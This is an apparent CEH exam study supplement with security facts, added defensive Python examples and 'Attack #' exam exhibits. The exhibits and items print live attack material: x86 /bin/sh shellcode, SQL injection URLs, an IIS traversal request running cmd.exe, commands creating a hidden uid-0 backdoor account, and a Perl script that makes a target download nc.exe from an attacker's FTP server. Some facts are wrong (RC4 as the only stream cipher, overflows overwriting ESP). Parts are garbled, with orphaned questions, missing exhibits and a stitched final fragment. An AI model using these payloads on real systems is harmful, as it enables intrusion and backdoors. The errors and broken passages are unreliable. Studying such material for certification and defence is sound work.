CEH Supplement v9 5
Hacker University
Page 3
Footprinting
20. Footprinting is the blueprinting of the security profile of an organization.
21. Examples of footprinting tools include SamSpade, NSLookup, Traceroute and NeoTrace.
22. NSLookup is a program to query Internet domain name servers. It is used to display DNS information.
23. Type the following to do a zone transfer with NSLookup:
    nslookup                (takes you into interactive mode)
    ls -d targetsite.com
24. Zone transfers allow you to list all DNS information for a domain.
25. Below is an example of a log entry that shows a possible zone transfer:
    Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 -> 10.8.0.7:53
26. There are several types of DNS records:
    A      host record
    CNAME  alias
    MX     mail exchange (mail server)
    NS     name server
    SOA    start of authority
27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam Spade, or Host to perform a zone transfer.
28. The highest-priority MX record has the lowest number.
29. A DNS SOA record will contain the following:
    Serial number   revision number (sometimes called version number)
    Refresh         refresh interval for secondary DNS servers
    Retry           retry interval if zone transfer fails
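The following Python example is added here and is not part of the original supplement. It parses a constructed, dig-style zone listing for a made-up domain (example.test, not a real site) of the kind an open zone transfer hands out, and pulls out exactly the things items 24, 28 and 29 talk about: the SOA timers, the preferred MX (lowest number), and the list of hosts a zone transfer would leak. The record names, addresses and timer values are all constructed.

```python
# Constructed dig-style zone listing for a made-up domain (not real records for any site).
# This is the shape of data an open zone transfer (nslookup "ls -d", dig AXFR) returns.
ZONE_LISTING = """
example.test.          3600 IN SOA   ns1.example.test. hostmaster.example.test. 2024031201 7200 900 1209600 3600
example.test.          3600 IN NS    ns1.example.test.
example.test.          3600 IN NS    ns2.example.test.
example.test.          3600 IN MX    20 backup-mail.example.test.
example.test.          3600 IN MX    10 mail.example.test.
mail.example.test.     3600 IN A     192.0.2.25
intranet.example.test. 3600 IN A     192.0.2.40
www.example.test.      3600 IN CNAME example.test.
"""


def parse_zone(text):
    """Split each '<name> <ttl> IN <type> <rdata...>' line into (name, ttl, type, rdata)."""
    records = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[2] != "IN":
            continue  # not a record line; skip it
        records.append((parts[0], int(parts[1]), parts[3], parts[4:]))
    return records


def soa_fields(records):
    """Name the SOA fields the way item 29 lists them (serial, refresh, retry, ...)."""
    for _name, _ttl, rtype, rdata in records:
        if rtype == "SOA":
            mname, rname, serial, refresh, retry, expire, minimum = rdata
            return {"primary": mname, "contact": rname, "serial": int(serial),
                    "refresh": int(refresh), "retry": int(retry),
                    "expire": int(expire), "minimum": int(minimum)}
    return None


def preferred_mx(records):
    """Item 28: the MX record with the lowest preference number is tried first."""
    mx = [(int(rdata[0]), rdata[1]) for _n, _t, rtype, rdata in records if rtype == "MX"]
    return min(mx)[1] if mx else None


def exposed_hosts(records):
    """Item 24: every host with an address record is what a zone transfer gives away."""
    return sorted(name for name, _t, rtype, _r in records if rtype == "A")


if __name__ == "__main__":
    recs = parse_zone(ZONE_LISTING)
    print("SOA:", soa_fields(recs))
    print("preferred MX:", preferred_mx(recs))
    print("hosts leaked by AXFR:", exposed_hosts(recs))
```

Checking whether a domain's name servers answer AXFR for anyone is the defensive use of this: the `exposed_hosts` list is the inventory an attacker would get for free, and the fix is to restrict zone transfers to the secondary servers named in the NS records.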
[Scan diagram (figure residue): Nmap -sT and Nmap -sS, both opening with a SYN.]
[Scan diagram (figure residue): FIN scan with Nmap -sF and XMAS scan with Nmap -sX.]
[Port listing (figure residue): Proto TCP, State Listening, PID 125.]
Enumeration
103. If Nmap was unable to identify the operating system of a web server, telnet to an open port and grab the banner.
104. Enumeration tools include USER2SID, SID2USER, and DumpSec.
105. The SID ending in 500 is the built-in Administrator account.
106. If the Administrator account has been renamed but you still know the SID, you can use sid2user to find the new name of the Administrator account.
107. The default passwords (community strings) in SNMP are private (read-write) and public (read-only). These community strings are sent in clear text and are therefore susceptible to sniffing.
108. You should use SMB signing to protect against hackers modifying SMB packets and forwarding them.
109. If you must run an SMTP server, you cannot prevent people from using telnet to connect to port 25 on your e-mail server.
110. Hackers will often send a single SMTP message to an address that does not exist to gather information about internal hosts used in e-mail handling.
111. To grab the banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0.
112. An attacker may scan port 137 to check for file and print sharing on Windows systems.
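The following Python example is added here and is not from the original supplement. It shows the point behind items 105 and 106 from the auditing side: the relative identifier (RID) at the end of a SID, not the account name, identifies the built-in Administrator. The account listing is constructed to look like a user2sid/DumpSec dump; the names and the domain portion of the SIDs are made up.

```python
import re

# Well-known relative identifiers (RIDs). 500 and 501 are the built-in local accounts;
# 512 and 513 are the default domain groups.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest",
                   512: "Domain Admins", 513: "Domain Users"}

SID_PATTERN = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Return (identifier authority, sub-authorities, RID) for a textual SID."""
    m = SID_PATTERN.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    subs = [int(p) for p in m.group(2).split("-")[1:]]
    return int(m.group(1)), subs, subs[-1]


def describe(sid):
    """Label a SID by its RID; anything not in the table is an ordinary account."""
    _auth, _subs, rid = parse_sid(sid)
    return WELL_KNOWN_RIDS.get(rid, "ordinary account")


# Constructed account listing (name, SID) shaped like an enumeration dump. The domain
# identifier 1004336348-1177238915-682003330 is made up.
SAMPLE_ACCOUNTS = [
    ("svc_backup",    "S-1-5-21-1004336348-1177238915-682003330-500"),
    ("Administrator", "S-1-5-21-1004336348-1177238915-682003330-1105"),
    ("Guest",         "S-1-5-21-1004336348-1177238915-682003330-501"),
    ("jdoe",          "S-1-5-21-1004336348-1177238915-682003330-1001"),
]


def find_renamed_admin(accounts):
    """Item 106: whichever name carries RID 500 is the real Administrator, whatever it is called."""
    return [name for name, sid in accounts
            if parse_sid(sid)[2] == 500 and name.lower() != "administrator"]


def find_decoy_admins(accounts):
    """Accounts named 'Administrator' whose RID is not 500 are decoys, not the built-in account."""
    return [name for name, sid in accounts
            if name.lower() == "administrator" and parse_sid(sid)[2] != 500]


if __name__ == "__main__":
    for name, sid in SAMPLE_ACCOUNTS:
        print(f"{name:15} {sid}  -> {describe(sid)}")
    print("renamed built-in Administrator:", find_renamed_admin(SAMPLE_ACCOUNTS))
    print("decoy Administrator accounts:", find_decoy_admins(SAMPLE_ACCOUNTS))
```

The practical lesson is that renaming the Administrator account is cosmetic; restricting anonymous SID/name lookups (the NULL session hardening covered in the labs later in this supplement) is what actually prevents the mapping.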
System Hacking
113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB exchanges, it could be that the network is using Kerberos.
Sniffers
171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding. ARP spoofing the default gateway is a common method to capture traffic on a switched network. Without techniques like MAC flooding or ARP spoofing, you will not be able to capture traffic on a switched network. Use ./macof to flood the port-to-MAC-address table (CAM table). This will move the switch into broadcast mode and allow you to sniff all packets on the network.
172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs. To detach Ettercap from the console and log all sniffed passwords to a file, use the command:
    ettercap -NCLzs --quiet
    Ethereal allows for filters. For example, to create a display filter that only looks for the three-way handshake for a connection from host 172.16.0.4, the filter would be:
    ip.addr==172.16.0.4 and tcp.flags.syn==1
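The following Python example is added here and is not from the original supplement. It is the detection side of the CAM-table flooding described in item 171: a normal access port sees a handful of source MAC addresses, while a macof-style flood shows thousands of never-seen addresses in a second. The frame records are constructed (port names and MAC addresses are made up); in practice they would come from a port mirror, sFlow, or the switch's own MAC-table logging.

```python
from collections import defaultdict, deque

# Constructed switch-side frame records: (timestamp, ingress port, source MAC).
FRAMES = [(0.0, "Gi1/1", "00:11:22:33:44:01"),
          (0.5, "Gi1/1", "00:11:22:33:44:01"),
          (1.0, "Gi1/2", "00:11:22:33:44:02")]
# A flood burst: 400 distinct, random-looking source MACs on one port within 0.4 s.
FRAMES += [(1.0 + i / 1000, "Gi1/3", f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}")
           for i in range(400)]


def cam_flood_alerts(frames, window=1.0, threshold=50):
    """Alert once per port when more than `threshold` distinct source MACs are seen
    within `window` seconds. Returns a list of (port, timestamp, distinct_mac_count)."""
    recent = defaultdict(deque)   # port -> deque of (ts, mac) still inside the window
    alerted = set()
    alerts = []
    for ts, port, mac in sorted(frames):
        q = recent[port]
        q.append((ts, mac))
        while q and ts - q[0][0] > window:   # slide the window forward
            q.popleft()
        distinct = len({m for _t, m in q})
        if distinct > threshold and port not in alerted:
            alerted.add(port)
            alerts.append((port, ts, distinct))
    return alerts


def macs_per_port(frames):
    """Steady-state view: how many distinct MACs each port has ever sourced."""
    seen = defaultdict(set)
    for _ts, port, mac in frames:
        seen[port].add(mac)
    return {port: len(macs) for port, macs in seen.items()}


if __name__ == "__main__":
    for port, ts, n in cam_flood_alerts(FRAMES):
        print(f"possible CAM flood on {port} at t={ts:.3f}s: {n} source MACs in 1s")
    print(macs_per_port(FRAMES))
```

The switch-side mitigation is port security (a per-port MAC limit with a shutdown or restrict action), which stops the table from filling in the first place; this script is the monitoring you would run on a mirror port to notice a flood on switches without it.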
Denial of Service
178. A smurf attack is when you send a broadcast ping with a spoofed source address of your target. A fraggle attack is similar to a smurf attack but uses UDP.
179. A SYN flood is a DoS attack in which a large number of SYN packets appear on a network without the corresponding reply packets.
180. A LAND attack is when an attacker forges a TCP/IP packet, causing the victim to try to open a connection with itself. This causes the system to go into an infinite loop which, in turn, can slow down the system.
181. The following are techniques used to block SYN flood attacks:
    Micro blocks: instead of allocating a complete connection object, simply allocate a micro-record.
    SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the client's IP address, port number, and other information. When the client responds with a normal ACK, the sequence number will be included, which the server then verifies.
    RST cookies: an alternative to SYN cookies where the server sends a wrong SYN/ACK back to the client. The client should generate a RST packet telling the server that something is wrong, which informs the server that the client is valid.
    Stack tweaking: TCP stacks can be tweaked to reduce the effects of SYN floods. For example, timeouts can be changed.
182. A Ping of Death attack sends fragmented ICMP packets that, when reconstructed, are larger than 65,536 bytes.
183. IDS devices are primary victims of smurf attacks.
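The following Python example is added here and is not from the original supplement. It works through the SYN cookie defense from item 181 as actual code: the server encodes a time slot, an MSS index and a keyed hash of the client's address and ports into the 32-bit initial sequence number it sends in the SYN-ACK, stores nothing, and only validates the cookie when the client's ACK (which carries cookie + 1) arrives. The secret key, the bit layout and the MSS table are constructed for the example; real stacks use the same idea with their own layouts.

```python
import hashlib
import hmac

SECRET = b"constructed-server-secret"   # a real stack generates this at boot and rotates it
MSS_TABLE = (536, 1220, 1440, 1460)      # constructed: the cookie stores an index, not the MSS


def _hash24(client_ip, client_port, server_port, slot):
    """24-bit keyed hash over the connection 4-tuple and the time slot."""
    msg = f"{client_ip}:{client_port}:{server_port}:{slot}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(client_ip, client_port, server_port, time_slot, client_mss):
    """Build the 32-bit ISN sent in the SYN-ACK. Constructed layout:
    5 bits time slot | 3 bits MSS index | 24 bits keyed hash.
    No per-connection state is kept, so a flood of SYNs costs the server nothing to remember."""
    slot = time_slot & 0x1F
    mss_idx = 0
    for i, mss in enumerate(MSS_TABLE):
        if mss <= client_mss:
            mss_idx = i                      # largest table entry not above the client's MSS
    return (slot << 27) | (mss_idx << 24) | _hash24(client_ip, client_port, server_port, slot)


def check_ack(client_ip, client_port, server_port, ack_number, time_slot):
    """Validate the client's final ACK. Returns the negotiated MSS if the cookie is genuine and
    fresh, or None if the ACK should be dropped. Spoofed-source SYNs never produce a valid ACK."""
    cookie = (ack_number - 1) & 0xFFFFFFFF   # the client acknowledges ISN + 1
    slot = cookie >> 27
    if (((time_slot & 0x1F) - slot) & 0x1F) > 1:
        return None                           # older than two slots: stale or replayed
    if (cookie & 0xFFFFFF) != _hash24(client_ip, client_port, server_port, slot):
        return None                           # forged, or lifted from a different 4-tuple
    return MSS_TABLE[(cookie >> 24) & 0x7]


if __name__ == "__main__":
    isn = make_cookie("10.8.0.7", 40000, 80, time_slot=10, client_mss=1460)
    print(f"SYN-ACK seq = {isn:#010x}")
    print("valid ACK  ->", check_ack("10.8.0.7", 40000, 80, (isn + 1) & 0xFFFFFFFF, 10))
    print("late ACK   ->", check_ack("10.8.0.7", 40000, 80, (isn + 1) & 0xFFFFFFFF, 13))
    print("wrong port ->", check_ack("10.8.0.7", 40001, 80, (isn + 1) & 0xFFFFFFFF, 10))
```

The trade-off the text hints at with "other information" is visible here: only a few bits of TCP options survive in the cookie, which is why stacks enable cookies only once the backlog is under pressure rather than all the time.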
Session Hijacking
194. To perform a session hijack, you must find the session, predict the sequence number, and take over the session.
195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage of session hijacking: taking over an already authenticated connection.
196. Hunt is a common session hijacking tool. It can intercept traffic and then perform a man-in-the-middle attack (MiTM).
197. In a man-in-the-middle (MiTM) attack, an attacker will intercept a transmission to copy and forward all packets between two hosts.
198. Using unpredictable sequence numbers will help secure against session hijacking.
199. TCP/IP session hijacking is carried out on the transport layer.
200. Challenge/response authentication is used to prevent session hijacking attacks.
201. Use unpredictable sequence numbers to secure sessions against hijacking.
Buffer Overflows
203. Canary words are a method used by compilers to send an alarm if a buffer overflow has been attempted. The canary adds NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff). If they have been altered when a function returns, an alarm is sent.
204. NOP sleds send a series of No Operation instructions in an attempt to guess the return pointer. The hexadecimal value for a NOP is 0x90.
205. The following code is usually an indication of a buffer overflow attack:
    char shellcode[] =
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b"
        "\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d"
        "\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f"
        "\x62\x69\x6e\x2f\x73\x68";
206. Buffer overflows can be exploited using such function calls as fgets(), scanf(), strcpy() and strncpy().
207. Buffer overflows are due to programming errors and bad quality assurance practices.
208. Polymorphic shellcode works by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode.
209. Two types of buffer overflows are heap based and stack based.
210. When writing shellcode, be sure to remove any null bytes, as a null byte will end the string.
211. Buffer overflows will overwrite the ESP register with a return address of the exploit code.
212. The following pseudo code demonstrates the logic of stopping a stack from holding more than 200 characters in a buffer:
    IF (I > 200) then exit (1)
213. Many IDS devices will have signatures for common buffer overflow attacks. Attackers can get around this by using polymorphic shellcode with a tool such as ADMutate to change the signature of their exploits.
214. Using printf(str) instead of printf("%s", str) may leave your program exposed to format string attacks.
215. Buffer overflows often try to exploit an application and launch a command shell. Below is an example of output from a network IDS of an attack that is trying to get a Linux command shell (/bin/sh):
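The following Python example is added here and is not from the original supplement. It implements the kind of static signature an IDS uses for items 204, 205 and 215 (a long run of 0x90 NOP bytes, or a "/bin/sh" string in a payload), parses the hex-dump format used in the Attack #7 log later in this supplement, and then shows why item 213 holds: the same payload XOR-encoded with one byte no longer matches, and the detector has to try the 255 possible keys to find it. The payloads and the XOR key are constructed.

```python
import re

# Constructed payloads. The first mimics the FTP "PASS" + 0x90 sled in the Attack #7 dump;
# the second is that payload XOR-encoded with a single byte, as item 208 describes.
SLED_PAYLOAD = b"PASS " + b"\x90" * 64 + b"/bin/sh\x00"
XOR_KEY = 0x41                                   # constructed key
ENCODED_PAYLOAD = bytes(b ^ XOR_KEY for b in SLED_PAYLOAD)


def longest_nop_run(payload):
    """Length of the longest run of 0x90 (x86 NOP) bytes in the payload."""
    best = 0
    for m in re.finditer(rb"\x90+", payload):
        best = max(best, len(m.group(0)))
    return best


def matches_signature(payload, min_sled=32):
    """Plain byte signature: a NOP sled of at least min_sled bytes, or a /bin/sh string."""
    return longest_nop_run(payload) >= min_sled or b"/bin/sh" in payload


def parse_hexdump(text):
    """Turn the hex columns of a Snort-style dump ('50 41 53 53 20 90 90 ...') into bytes.
    Only two-character hex words are taken, so the ASCII column ('PASS .') is ignored."""
    return bytes(int(h, 16) for h in re.findall(r"\b[0-9a-fA-F]{2}\b", text))


def single_byte_xor_variant_hits(payload, min_sled=32):
    """Try every single-byte XOR key and report the keys whose decoding matches the signature.
    This is the extra work a plain signature needs against the encoder in items 208 and 213."""
    return [k for k in range(1, 256)
            if matches_signature(bytes(b ^ k for b in payload), min_sled)]


if __name__ == "__main__":
    print("raw sled matches:", matches_signature(SLED_PAYLOAD))
    print("XOR-encoded matches:", matches_signature(ENCODED_PAYLOAD))
    print("keys that decode to a match:", single_byte_xor_variant_hits(ENCODED_PAYLOAD))
    print(parse_hexdump("50 41 53 53 20 90 90 90 90 90  PASS ."))
```

The usage note for a detection engineer: the NOP-run check is cheap and catches the classic sled, but the last function shows the cost of chasing encoders with byte signatures, which is why protocol-aware rules (an FTP PASS argument longer than a few hundred bytes, as in Attack #7) age better than byte patterns.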
Linux Hacking
248. ps is the command to list processes running on a system.
249. Rootkits can be used to hide processes, files, or registry entries.
250. The three most common commands that hackers attempt to Trojan on a Linux box are netstat, ps, and top.
251. Loadable Kernel Modules (LKM) are compiled on the fly; they do not require you to recompile the kernel.
252. Cygwin is a free UNIX subsystem that runs on top of Windows.
Cryptography
262. Hashing algorithms are used to guarantee the integrity of messages. SHA-1 creates a 160-bit hash; MD5 creates a 128-bit hash. Note: on the exam you may see this referred to as the number of bits of encryption and not the word hash.
263. Integrity can be defined as sound, unimpaired or perfect condition.
264. RC4 is the only stream cipher. Stream ciphers are a type of symmetric key encryption algorithm that transforms a stream of plaintext characters into a stream of ciphertext characters of the same length.
265. The tradeoff of encryption is speed. IPSEC VPNs can slow down your network.
266. Cryptography attacks include chosen-ciphertext, known-ciphertext, and replay attacks.
267. PKI is a way to distribute symmetric keys, usually by using asymmetric encryption techniques.
268. With XOR operations, if both values are the same, the result is zero. If the values are different, then the result is one:
    Value1  Value2  Result
    0       0       0
    0       1       1
    1       0       1
    1       1       0
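The following Python example is added here and is not from the original supplement. It checks the hash sizes from item 262 with the standard library, shows what "integrity" in item 263 means operationally (one flipped bit changes the digest, and the comparison is done in constant time), and demonstrates the stream-cipher property in item 264: XORing with a keystream gives ciphertext of the same length, and XORing again with the same keystream restores the plaintext, which is the XOR rule in item 268 applied byte by byte. The keystream here is a constructed fixed byte string, not RC4.

```python
import hashlib
import hmac


def digest_bits(name):
    """Output size in bits of a hashlib algorithm (item 262: sha1 -> 160, md5 -> 128)."""
    return hashlib.new(name).digest_size * 8


def fingerprint(message, name="sha256"):
    return hashlib.new(name, message).hexdigest()


def integrity_ok(message, expected_hex, name="sha256"):
    """Recompute the digest and compare in constant time (avoids timing leaks on the compare)."""
    return hmac.compare_digest(fingerprint(message, name), expected_hex)


def flip_bit(data, bit):
    """Return a copy of data with one bit flipped (simulates in-transit corruption or tampering)."""
    buf = bytearray(data)
    buf[bit // 8] ^= 1 << (bit % 8)
    return bytes(buf)


def xor_bit(a, b):
    """Item 268: same inputs give 0, different inputs give 1."""
    return a ^ b


def xor_keystream(data, keystream):
    """Stream-cipher step: each byte of data is XORed with the matching keystream byte.
    Output length equals input length (item 264). Applying it twice restores the input."""
    if len(keystream) < len(data):
        raise ValueError("keystream shorter than data")   # never reuse or truncate a keystream
    return bytes(d ^ k for d, k in zip(data, keystream))


if __name__ == "__main__":
    msg = b"transfer 100 to account 42"                       # constructed message
    tag = fingerprint(msg, "sha1")
    print("sha1 bits:", digest_bits("sha1"), "md5 bits:", digest_bits("md5"))
    print("intact:", integrity_ok(msg, tag, "sha1"), "tampered:", integrity_ok(flip_bit(msg, 5), tag, "sha1"))
    ks = bytes(range(7, 7 + len(msg)))                       # constructed keystream
    ct = xor_keystream(msg, ks)
    print("ciphertext length == plaintext length:", len(ct) == len(msg))
    print("decrypts:", xor_keystream(ct, ks) == msg)
```

Note that a bare hash only detects accidental change; to detect deliberate tampering by someone who can also replace the hash, the digest must be keyed (an HMAC) or signed, which is where the PKI of item 267 comes in.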
SQL Injection
276. You can test for SQL injection by entering a single quote, or by typing anything or 1=1, in a username field on a web site.
277. The next step after determining that a web site is vulnerable is to identify the database and table name by running:
    http://www.mysite.com/test/include.asp?numberID=4 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
278. An example of SQL injection is:
    http://www.testsite.com/data.asp?name=me%27%3bupdate%20user table%20set%20pass%3d%27letmein%27%3b--%00
279. SQL injection can be used where there are poorly designed input validation routines.
280. The following is an example of code that is susceptible to a SQL injection attack because it provides no input validation:
    sSQL="SELECT * FROM Users where Username='" & Request("user") & "' and Password='" & Request("pwd") & "'"
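The following Python example is added here and is not from the original supplement. It rebuilds the login query from item 280 in two forms against an in-memory SQLite database: the string-concatenation version that the ASP code uses, and a parameterized version. The Users table, the account and the password are constructed; the test input is the single quote plus or 1=1 probe from item 276.

```python
import sqlite3


def setup_db():
    """Constructed Users table matching the columns in the item 280 query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret-constructed')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """Mirrors the ASP concatenation: the request values become part of the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM Users WHERE Username='" + user +
           "' AND Password='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, user, pwd):
    """Fix: the SQL text is constant and the values travel as bound parameters,
    so a quote or comment marker in the input is just data compared against the column."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


def build_query_text(user, pwd):
    """Show the exact statement the vulnerable version would send (useful when reviewing logs)."""
    return "SELECT * FROM Users WHERE Username='" + user + "' AND Password='" + pwd + "'"


if __name__ == "__main__":
    conn = setup_db()
    probe = "' or 1=1--"
    print("query sent:", build_query_text(probe, "x"))
    print("vulnerable login with probe:", login_vulnerable(conn, probe, "x"))
    print("parameterized login with probe:", login_parameterized(conn, probe, "x"))
    print("parameterized login with real creds:", login_parameterized(conn, "alice", "s3cret-constructed"))
```

The comment marker at the end of the probe is why the trailing AND Password clause disappears in the vulnerable version; the parameterized version never parses the input as SQL, so no input validation routine is needed for this particular bug (validation is still good practice for other reasons).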
Viruses
298. Messenger spam is when you receive a pop-up on your screen containing spam. It usually uses ports 1026 to 1029.
Social Engineering
329. You will need to enforce the corporate network security policy to resolve issues with employees bypassing the firewall by attaching a modem to their telephone line and workstations.
330. Social engineering can help you bypass a firewall. For example, you can create a web page that users can click on and, upon clicking, a keylogger can be embedded on their system.
331. Social engineering is the act of getting needed information from a person rather than breaking into a system.
332. An example of a phishing attack is when you receive an e-mail asking you to click on a link that takes you to a different site than the one mentioned in the e-mail.
333. The current most common vehicle for social engineering attacks is e-mail.
334. Social engineering is an easy and extremely effective method of gaining information.
335. The best way to break into a highly secure system that is virtually impenetrable is to use social engineering tactics like bribing employees with money to provide you with sensitive information.
336. The weakest links in the security chain are untrained staff or ignorant computer users who inadvertently compromise security.
337. To determine the first octet of a DWORD-encoded URL, divide the number by 16,777,216.
338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222.
339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.
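The following Python example is added here and is not from the original supplement. It decodes the obfuscated URL hosts from items 337 and 338 (a single DWORD, a single hex number, or per-octet hex) back to a normal dotted address, which is what a phishing filter or a link-checking proxy has to do before it can compare a link against a block list. The sample hosts are constructed; the integer-to-octet rule is the one the text gives (first octet = number divided by 16,777,216).

```python
import ipaddress


def first_octet(dword):
    """Item 337: the first octet of a DWORD-encoded address is the number divided by 2**24."""
    return dword // 16_777_216


def _component_value(token):
    """One dotted component as browsers parse it: 0x-hex, leading-zero octal, or decimal."""
    if token.lower().startswith("0x"):
        return int(token, 16)               # item 338: 0xde -> 222
    if len(token) > 1 and token.startswith("0"):
        return int(token, 8)
    return int(token, 10)


def decode_host(host):
    """Return the dotted-quad IPv4 address an obfuscated numeric host resolves to, or None
    if the host is a real name (or not a form this decoder handles)."""
    parts = host.split(".")
    try:
        values = [_component_value(p) for p in parts]
    except ValueError:
        return None                          # contains letters other than hex: a hostname
    if len(parts) == 1:                      # whole address as one DWORD or one hex number
        value = values[0]
    elif len(parts) == 4:                    # four components, each 0..255 in any base
        if any(v > 255 for v in values):
            return None
        value = 0
        for v in values:
            value = value * 256 + v
    else:
        return None                          # 2- and 3-part shorthand not handled here
    if value > 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(value))


def is_obfuscated(host):
    """True when the host is numeric but not already a plain dotted-decimal address."""
    decoded = decode_host(host)
    return decoded is not None and decoded != host


if __name__ == "__main__":
    for h in ("3232235777", "0xC0A80101", "0xde.0xad.0xbe.0xef", "192.168.1.1", "www.example.test"):
        print(f"{h:22} -> {decode_host(h)}  obfuscated={is_obfuscated(h)}")
    print("first octet of 3232235777:", first_octet(3232235777))
```

A link whose host decodes to an address different from how it is written is a strong phishing indicator on its own, independent of where the address points.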
Physical Security
340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access to a building.
341. RFID tags are often used to manage inventory, but they could leak sensitive information, so they should be disabled when the tags are no longer needed. Use the RFID kill switch in RFID chips to disable RFID tags when they are no longer needed.
Attack #2
GET /msadc/../../../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.mspowerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Host: lib.bvxttrip.org
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW
Attack #3
A screen pops up on your screen with the following message:
    Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM
    STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found Critical Errors. To fix the errors please do the following:
    1. Download Registry Repair from http://www.repairreg.com
    2. Install Registry Repair
    3. Run Registry Repair
    4. Reboot your computer
    FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION
What could cause this message?
A. Windows messenger SPAM
B. MyDoom virus
C. Beast Trojan
D. Denial of Service attack
What does this mean?
A. Attacker is using NAT.
B. Attacker modified the TCP/IP stack on the attacking system.
C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.
D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
Attack #5
Log entry: 1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF
Attack #6
mkdir -p /etc/X11/appInk/Internet/.etc
mkdir -p /etc/X11/appInk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
Attack #7
12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90   PASS .
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ..
Attack #8
############################################
$port = 53;                    # Spawn cmd.exe on port X
$your = "192.168.1.1";         # Your FTP server
$user = "Anonymous";           # login as
$pass = 'noone@nowhere.com';   # password
############################################
$host = $ARGV[0];
print "Starting\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
What does this code do?
A. Creates a share called sasfile
B. Creates a backdoor account
C. Opens a telnet listener that requires no username or password
D. Creates a FTP server
Attack #9
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST, "ns.list");
@list = <LIST>;
close LIST;
chomp(@list);
my $lnum = @list;
my $i = 0;
my $loop = 0;
What type of attack is this?
A. DNS lookup attacks
B. DNS reflection and amplification attack
C. FTP DOS
D. FTP backdoor
C:\>type file.txt
C:\>copy file.txt c:\inetpub\wwwroot
C:\>GET file.txt HTTP/1.1
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 15:44:12 GMT
ETag: 9814ed8abc83103:8ff
Content-Length: 5131
Return-Path: <bgates@microsoft.com>
